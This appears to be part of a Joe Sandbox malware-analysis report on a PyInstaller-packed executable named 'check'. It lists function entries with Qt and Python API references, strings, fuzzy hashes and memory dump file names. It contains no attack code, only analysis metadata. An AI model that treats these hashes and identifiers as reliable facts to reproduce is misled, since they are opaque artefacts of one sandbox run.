                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a145a8973ecd7916349f97ad2da27fabe66d3c89dc940e277f96f4bf9d252475
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621C937A08A4AD1DB208F15E8496A933B4FB44BD4F914032DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$setBottomPadding$setBottomPadding(self, padding: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-1056005245
                                                                                                                                                                                                                                          • Opcode ID: bc27af2a7ca2ef77cda6ca9c222fa64936b79409bf1b8e011750aaa61cdf996e
                                                                                                                                                                                                                                          • Instruction ID: 786f58922c6a5572c1df37c52780068f2b1d863955b5f9ba057d0048a951d5f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc27af2a7ca2ef77cda6ca9c222fa64936b79409bf1b8e011750aaa61cdf996e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A721C736A08E4AD1DB208F15E8896A933B4FB44BC4F914032DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setFontOverline$setFontOverline(self, overline: bool)
                                                                                                                                                                                                                                          • API String ID: 3865857979-2878939556
                                                                                                                                                                                                                                          • Opcode ID: b52d3690fe1dd3d4c24b8a662bd3bfe58b14a7997aa839cf364daa0bd3c13195
                                                                                                                                                                                                                                          • Instruction ID: 19279f6a2e339417b563a03b271e13b7178a903c032901af812ab5731bf8329b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b52d3690fe1dd3d4c24b8a662bd3bfe58b14a7997aa839cf364daa0bd3c13195
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F210B36A08B4AD1DB20CF11E8496A933B5FB44B84F954032DA9E43724EF3DE559C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _PyArg_CheckPositional.PYTHON313 ref: 00007FF89ECA3901
                                                                                                                                                                                                                                          • _PyArg_BadArgument.PYTHON313 ref: 00007FF89ECA3934
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA11C0: PyUnicode_CompareWithASCIIString.PYTHON313 ref: 00007FF89ECA11F2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA11C0: PyUnicode_CompareWithASCIIString.PYTHON313 ref: 00007FF89ECA120A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA11C0: PyType_IsSubtype.PYTHON313 ref: 00007FF89ECA122D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
                                                                                                                                                                                                                                          • String ID: argument 1$argument 2$normalize$str
                                                                                                                                                                                                                                          • API String ID: 4101545800-1320425463
                                                                                                                                                                                                                                          • Opcode ID: 85e1f99dde411cb278f0b98270a6e8254a8096954b810f161da5d99ca4afd163
                                                                                                                                                                                                                                          • Instruction ID: ab28b69566d428c976049e6927eab1dc864c1ccd2c71d827f5f954a5c9911642
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85e1f99dde411cb278f0b98270a6e8254a8096954b810f161da5d99ca4afd163
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D911C861B1868690E7B08B15E4C06B92B61EF04FC8F488432EA8D07795DE2CF584C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?distanceDoubleFloat_FromLine@V1@0@Vector2
                                                                                                                                                                                                                                          • String ID: BJ9J9$QVector2D$distanceToLine$distanceToLine(self, point: QVector2D, direction: QVector2D) -> float
                                                                                                                                                                                                                                          • API String ID: 1543135828-405816686
                                                                                                                                                                                                                                          • Opcode ID: b8127b268a2bbf6dd7300f6d9f691489e5ef914b8f61927b9e049137e4a07284
                                                                                                                                                                                                                                          • Instruction ID: 534f7008cbf50e9d878daab52b93b0ebb994a81cd06d7319ea774a16e746fd65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8127b268a2bbf6dd7300f6d9f691489e5ef914b8f61927b9e049137e4a07284
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C112877A08F46C1DB20CF50E8892AD73A4FB44B90F918136DA9E47320EF39E999C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?showNormal@RestoreSaveWindow@@
                                                                                                                                                                                                                                          • String ID: QWindow$showNormal$showNormal(self)
                                                                                                                                                                                                                                          • API String ID: 426591181-900794078
                                                                                                                                                                                                                                          • Opcode ID: c5fd94cd696d468a522a48b1a41e003fb38d53b90f0e7a6bdef6da97b9826e45
                                                                                                                                                                                                                                          • Instruction ID: 300b0e599e5de0bec59089c9c600c67ac1a9e991985eccd776b5536caadd90a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5fd94cd696d468a522a48b1a41e003fb38d53b90f0e7a6bdef6da97b9826e45
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A611DA76A08B46C1EB109F51E8896A933A4FB44FD4F955032EA9E03320EF7CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?beginAbstractItemModel@Model@@ResetRestoreSave
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$beginResetModel$beginResetModel(self)
                                                                                                                                                                                                                                          • API String ID: 4136900167-2451044599
                                                                                                                                                                                                                                          • Opcode ID: eebcf2e300671057d8ff72aee1aa14122a0d02e87a475b7e2b065e613e7e97c6
                                                                                                                                                                                                                                          • Instruction ID: 5fdbb185932001b0c6945e1b38c49ff4920ec619e6078d0d7e713789db30b588
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eebcf2e300671057d8ff72aee1aa14122a0d02e87a475b7e2b065e613e7e97c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC11DA36A08B4AD1DB109F51E8496A933A4FB48FD4F954032DA9E07320EF7CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?endAbstractItemModel@Model@@ResetRestoreSave
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$endResetModel$endResetModel(self)
                                                                                                                                                                                                                                          • API String ID: 167963407-115090492
                                                                                                                                                                                                                                          • Opcode ID: 1b4bff4ed0664750f26292fd1c8b4ef745dca8d27799a93798ed7232d9c809b5
                                                                                                                                                                                                                                          • Instruction ID: f6c3f9d3e386fbac20004ce3480149ff78bd0486845cd4772acfddfabc659918
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b4bff4ed0664750f26292fd1c8b4ef745dca8d27799a93798ed7232d9c809b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F11C876A08B46D1EB109F11E8496A933A4FB88FD4F954032DA9E03320EF7CE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_Connected@FromLongMetaMethod@@@Object@@Signal
                                                                                                                                                                                                                                          • String ID: BJ9$QSyntaxHighlighter$isSignalConnected$isSignalConnected(self, signal: QMetaMethod) -> bool
                                                                                                                                                                                                                                          • API String ID: 544305041-3622301315
                                                                                                                                                                                                                                          • Opcode ID: 0b186527a7c32fde057e19afc3debdda5f8a29f0c83d469de7bee5b7e90abdcf
                                                                                                                                                                                                                                          • Instruction ID: c5ec8ab6240195888374d78051f4c347f68e2830247cd3cf3ac9f5a14aacb330
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b186527a7c32fde057e19afc3debdda5f8a29f0c83d469de7bee5b7e90abdcf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4110636A18F46C1EB109F21E8896A933E4FB44B94F914032CA9E47320EF3DE559C348
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_Connected@FromLongMetaMethod@@@Object@@Signal
                                                                                                                                                                                                                                          • String ID: BJ9$QDoubleValidator$isSignalConnected$isSignalConnected(self, signal: QMetaMethod) -> bool
                                                                                                                                                                                                                                          • API String ID: 544305041-3212557205
                                                                                                                                                                                                                                          • Opcode ID: e7b7f2a00b13e59cd2dc0b513c5587b7c1e6d2be77ff2416051fa28ffc45f459
                                                                                                                                                                                                                                          • Instruction ID: ed0053092eef5fcfe5a4b9583023cecf5b93b49ed820eb4518ada53a0b60d809
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7b7f2a00b13e59cd2dc0b513c5587b7c1e6d2be77ff2416051fa28ffc45f459
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2111836A08F46C1EB10DF25E8896A933E4FB44B94F914032CA9E07320EF3DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?quadBool_FromLongPolygonSquare@Transform@@V1@@
                                                                                                                                                                                                                                          • String ID: J9J9$QTransform$quadToSquare$quadToSquare(quad: QPolygonF, result: QTransform) -> bool
                                                                                                                                                                                                                                          • API String ID: 180076461-2972677403
                                                                                                                                                                                                                                          • Opcode ID: c93268c15d8a67622563f5231641df0aba3efc97a0cf4405c5368f56375e02c2
                                                                                                                                                                                                                                          • Instruction ID: 6d7248f984c5b596b50de675d9ef45f6047506a4fb301f94176698e660676d01
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c93268c15d8a67622563f5231641df0aba3efc97a0cf4405c5368f56375e02c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8012536A08E46D1EB109F21E8896A933F5FB44FD5F914032DA9E07320EE3CE569C744
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                          • String ID: J9J9$J9f$fJ9
                                                                                                                                                                                                                                          • API String ID: 2803490479-1735737320
                                                                                                                                                                                                                                          • Opcode ID: de3e3daff530d36339894ed25ca98a053840b6e5a91a6427aa78bc3cfec6ebf5
                                                                                                                                                                                                                                          • Instruction ID: 87d3f7dec105e6f147cd9c07584a7a37d4834e442ad094e97f44756d70f6e0e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de3e3daff530d36339894ed25ca98a053840b6e5a91a6427aa78bc3cfec6ebf5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12613037609B4585EB608F26E8442A977A5FB88FD8F455136EE8E43B68EF3CE150C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawEngine@@Lines@Paint$LineLine@@
                                                                                                                                                                                                                                          • String ID: QPaintEngine$drawLines$drawLines(self, lines: Optional[PyQt5.sip.array[QLine]])drawLines(self, lines: Optional[PyQt5.sip.array[QLineF]])
                                                                                                                                                                                                                                          • API String ID: 1512926883-3197972377
                                                                                                                                                                                                                                          • Opcode ID: 727c9b396a0523dd205d7431e2e43b246fad74a3ec8e951e0c44ea087e62fb1d
                                                                                                                                                                                                                                          • Instruction ID: d5202546bf3c4f0ea078323a3ab25f31469ceb58ec793c652a0532a946e4f8c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 727c9b396a0523dd205d7431e2e43b246fad74a3ec8e951e0c44ea087e62fb1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB411D33A09B46D9EB608F25E8442A973B4FB44BD8F544132EA8E07B64EF3CE554C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                          • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                          • Instruction ID: b1cbeaba42348124522203c7b92dd1bdc309ccd5032514b0233f9594a50995f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD318832A19E8185E724EF21E8951F9A360FF887A4F840135EE4D47B59DFBCD109C714
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?sibling@QStandardItemModel@@UEBA?AVQModelIndex@@HHAEBV2@@Z.QT5GUI ref: 00007FF89D957B11
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?sibling@Index@@ItemModelModel@@StandardV2@@
                                                                                                                                                                                                                                          • String ID: BiiJ9$QStandardItemModel$sibling$sibling(self, row: int, column: int, idx: QModelIndex) -> QModelIndex
                                                                                                                                                                                                                                          • API String ID: 4033914243-2828631231
                                                                                                                                                                                                                                          • Opcode ID: 135fce5793d2982851daaad1c806d99333b58bbf3db7662b1d916b3dbd8bb9ea
                                                                                                                                                                                                                                          • Instruction ID: 04a04c9238ebb5e0d761613ad2c313e6800216ba208cd3757e13e578f25ad626
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 135fce5793d2982851daaad1c806d99333b58bbf3db7662b1d916b3dbd8bb9ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96411D37609B8686DB608B15F4447AAB3A4FB85BD4F444132DACE47B68EF3CE158CB04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??_5ClearDeallocErr_PainterPath@@SubtypeType_V0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 3782086040-2407233842
                                                                                                                                                                                                                                          • Opcode ID: a4a34e5d2ba8fedf45471c823aca0f4390a1b510b39d012cddb1247cb02abc06
                                                                                                                                                                                                                                          • Instruction ID: 5bee5dd4ef8bf68cb77d885964666bf7ecf34028ff4ce995ebee515c106736ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4a34e5d2ba8fedf45471c823aca0f4390a1b510b39d012cddb1247cb02abc06
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F31DD27A08B45D1EA609B16F845169A3B0FB89FD8F494432EE8E13B64EF7CE495C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?drawTiledPixmap@QPaintEngine@@UEAAXAEBVQRectF@@AEBVQPixmap@@AEBVQPointF@@@Z.QT5GUI ref: 00007FF89D93DEF1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawEngine@@F@@@PaintPixmap@Pixmap@@PointRectTiled
                                                                                                                                                                                                                                          • String ID: BJ9J9J1$QPaintEngine$drawTiledPixmap$drawTiledPixmap(self, r: QRectF, pixmap: QPixmap, s: Union[QPointF, QPoint])
                                                                                                                                                                                                                                          • API String ID: 4155984045-2242633221
                                                                                                                                                                                                                                          • Opcode ID: ae30e2d43485c4eb3d04c5792709820ee6713515d118215b7e44870b64c22745
                                                                                                                                                                                                                                          • Instruction ID: f407e271178865c3bb53d4c4003ace3d8e2f2887f83de686553f6156f8b203d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae30e2d43485c4eb3d04c5792709820ee6713515d118215b7e44870b64c22745
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D341C937609B8585EA709B15E4843AAB7A4FB94FD4F444136DACE43B68EF3CE158C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?sizePixels@QPageSize@@QEBA?AVQSize@@H@Z.QT5GUI ref: 00007FF89D9BFB39
                                                                                                                                                                                                                                          • ?sizePixels@QPageSize@@SA?AVQSize@@W4PageSizeId@1@H@Z.QT5GUI ref: 00007FF89D9BFBB0
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Size@@$Page$?sizePixels@$Id@1@Sizemalloc
                                                                                                                                                                                                                                          • String ID: QPageSize$sizePixels$sizePixels(self, resolution: int) -> QSizesizePixels(pageSizeId: QPageSize.PageSizeId, resolution: int) -> QSize
                                                                                                                                                                                                                                          • API String ID: 2324535246-1560509091
                                                                                                                                                                                                                                          • Opcode ID: 66e414b494ddf837f25a746e84172902b47f45ba007d1862b03aa6034a574a9e
                                                                                                                                                                                                                                          • Instruction ID: a36226ba378e5a31fa3c060f5c0b1221f5887952dcc79abb0686b7135d56f738
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66e414b494ddf837f25a746e84172902b47f45ba007d1862b03aa6034a574a9e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C315E73A09A06C6EB108F15E8556A933E5FB84FD0F914132DA8E07720EF3DE555CB44
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setMarkdown@QTextDocument@@QEAAXAEBVQString@@V?$QFlags@W4MarkdownFeature@QTextDocument@@@@@Z.QT5GUI ref: 00007FF89D957EEA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setDocument@@Document@@@@@Feature@Flags@MarkdownMarkdown@String@@
                                                                                                                                                                                                                                          • String ID: BJ1|J1$QTextDocument$setMarkdown$setMarkdown(self, markdown: Optional[str], features: Union[QTextDocument.MarkdownFeatures, QTextDocument.MarkdownFeature] = QTextDocument.MarkdownDialectGitHub)
                                                                                                                                                                                                                                          • API String ID: 4162315510-1142115851
                                                                                                                                                                                                                                          • Opcode ID: d580350cc8bd0c0dc915bba725e2cf6bc699f5d1c6cd3be88189093a3fb6e6bd
                                                                                                                                                                                                                                          • Instruction ID: de85f13daa191d733e7f939cfce87b4d1bf231080c06e878260c8788228460b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d580350cc8bd0c0dc915bba725e2cf6bc699f5d1c6cd3be88189093a3fb6e6bd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4641B13B619B4585DB60CB15E8883AD73A9FB48BD0F814136DA9E43724EF39E958C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7124F918F,?,00007FF7124F3C55), ref: 00007FF7124F2BA0
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF7124F2C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                          • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                          • Instruction ID: cba7b91b10c78df430e1eacb77bafa8c185751a48a2d9d25eeb7d5bc6aee0c6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D21A162708F4182E710EF18F8857AAB3A4FB88794F804136EE8D57655EE7CD619C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?position@Block@@Text$Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 3416477650-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 8774caffab72a64adcc6f75695b45b357ca1073eb9c73a8f65749ad8fdc56cea
                                                                                                                                                                                                                                          • Instruction ID: 5d4805e25314496ea77f89201c429bc206c5bf2804cc6c8db5e5b197a3d83c3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8774caffab72a64adcc6f75695b45b357ca1073eb9c73a8f65749ad8fdc56cea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC21D86BA09B4686EA219B55E4481A9A3A4EF84FE5F444031DE8E03764EF3CF495D708
                                                                                                                                                                                                                                          APIs
